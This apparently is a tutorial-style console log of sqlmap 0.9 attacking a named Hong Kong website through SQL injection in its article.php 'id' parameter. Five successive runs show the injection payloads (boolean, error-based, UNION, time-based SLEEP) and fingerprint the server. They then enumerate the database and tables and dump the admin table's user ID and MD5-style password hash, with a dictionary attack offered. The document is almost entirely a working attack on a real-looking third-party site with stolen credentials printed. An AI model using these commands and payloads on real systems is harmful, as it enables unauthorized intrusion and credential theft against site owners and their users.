sqlmap example: MySQL injection
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the current user
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 16:53:54
using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
resuming injection data from session file
resuming back-end DBMS 'mysql 5.0' from session file
testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
fetching current user
current user: 'root@localhost'
Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
[*] shutting down at: 16:53:58
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* Current database
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 16:54:16
using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
resuming injection data from session file
resuming back-end DBMS 'mysql 5.0' from session file
testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
fetching current database
current database: 'wepost'
Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
[*] shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* Get the tables of the current database
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 16:55:25
using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
resuming injection data from session file
resuming back-end DBMS 'mysql 5.0' from session file
testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
fetching tables for database 'wepost'
the SQL query used returns 6 entries
Database: wepost
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
[*] shutting down at: 16:55:33
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users -D "wepost" -v 0 /* Get the columns of the admin table
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+
[*] shutting down at: 16:56:19
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* Get the field contents
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? y
what's the dictionary's location?
do you want to use common password suffixes? (slow!) y
Database: wepost
Table: admin
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+
[*] shutting down at: 16:58:14
D:\Python27\sqlmap>